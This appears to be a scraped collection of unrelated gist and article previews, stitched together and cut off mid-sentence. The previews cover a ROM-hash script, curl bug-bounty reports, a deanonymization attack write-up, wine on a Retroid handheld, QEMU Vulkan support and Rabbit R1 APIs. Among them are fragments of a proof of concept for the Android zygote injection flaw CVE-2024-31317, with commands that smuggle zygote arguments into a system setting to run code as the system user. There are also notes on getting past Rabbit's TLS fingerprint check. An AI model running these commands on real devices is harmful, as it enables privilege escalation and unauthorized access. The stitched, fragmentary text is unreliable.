| # License: MIT | |
| import sys | |
| import mmap | |
| import hashlib | |
| import struct | |
| # MD5 hashes from https://datomatic.no-intro.org | |
| # Headerless, as header is changed from non-AC releases. | |
| known_roms = { |
This collection is limited to only include the reports that were submitted as security vulnerabilities to the curl bug-bounty program on Hackerone.
Several other issues not included here are highly suspcious as well.
Thanks to everyone that made this possible:
grimdoomer: For the Bad Update exploit
InvoxiPlayGames: For the FreeMyXe project
hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.
3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.
I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:
By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k
Using wine is a deep rabbit hole for anyone not familiar with the software, and an even deeper rabbit hole when combined with box86 or box64. This guide attempts to serve as a basic introduction to using the built-in wine and box packages included with Rocknix on a Retroid Pocket 5. While the Retroid Pocket Mini is a similar setup chain, it is weaker hardware than the Retroid Pocket 5 and thus the examples provided here may not function as well.
The first thing anyone should understand is the vernacular used throughout this guide. Two tools are used to make wine ports possible on ARM64:
Box86 and Box64 by ptitSeb are Linux x86 and x86_64 emulators targeting AARCH64/ARM64 architecture.
Wine is a software that allows Windows programs to run on Linux systems. Prebuilt wine binaries can be downloaded from the [wine-builds](https://github.com
| am force-stop com.android.settings | |
| settings put global hidden_api_blacklist_exemptions "LClass1;->method1( | |
| 15 | |
| --runtime-args | |
| --setuid=1000 | |
| --setgid=1000 | |
| --runtime-flags=2049 | |
| --mount-external-full | |
| --target-sdk-version=29 | |
| --setgroups=3003 |
With its latest reales qemu added the Venus patches so that virtio-gpu now support venus encapsulation for vulkan. This is one more piece to the puzzle towards full Vulkan support.
An outdated blog post on clollabora described in 2021 how to enable 3D acceleration of Vulkan applications in QEMU through the Venus experimental Vulkan driver for VirtIO-GPU with a local development environment. Following up on the outdated write up, this is how its done today.
Let's start with the brief description of the projects mentioned in the post & extend them:
| #!/bin/sh | |
| # PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317: | |
| # https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html | |
| # | |
| # USAGE (android 13, with pre-13 use 12200 instead of 32768): | |
| # host$ adb push payload.sh /sdcard/ | |
| # host$ adb shell | |
| # shell$ logcat -c; settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 \ | |
| # --runtime-args --setuid=1000 --setgid=1000 --runtime-flags=16787456 --mount-external-default --target-sdk-version=22 \ | |
| # --setgroups=3003 --nice-name=com.android.settings --seinfo=platform:privapp:targetSdkVersion=33:complete \ |
The Rabbit R1 uses a few custom APIs to talk to The Cloud™. Almost nothing happens on-device, and all the AI magic happens on servers.
Consequently, you don't really need the physical device.
In lieu of an authentication scheme, Rabbit's servers attempt to verify device authenticity by checking the TLS client's JA3 fingerprint, presumably enforced by AWS WAF.
If your TLS client doesn't match an expected fingerprint, you'll get HTTP 403 errors. This fingerprint works:
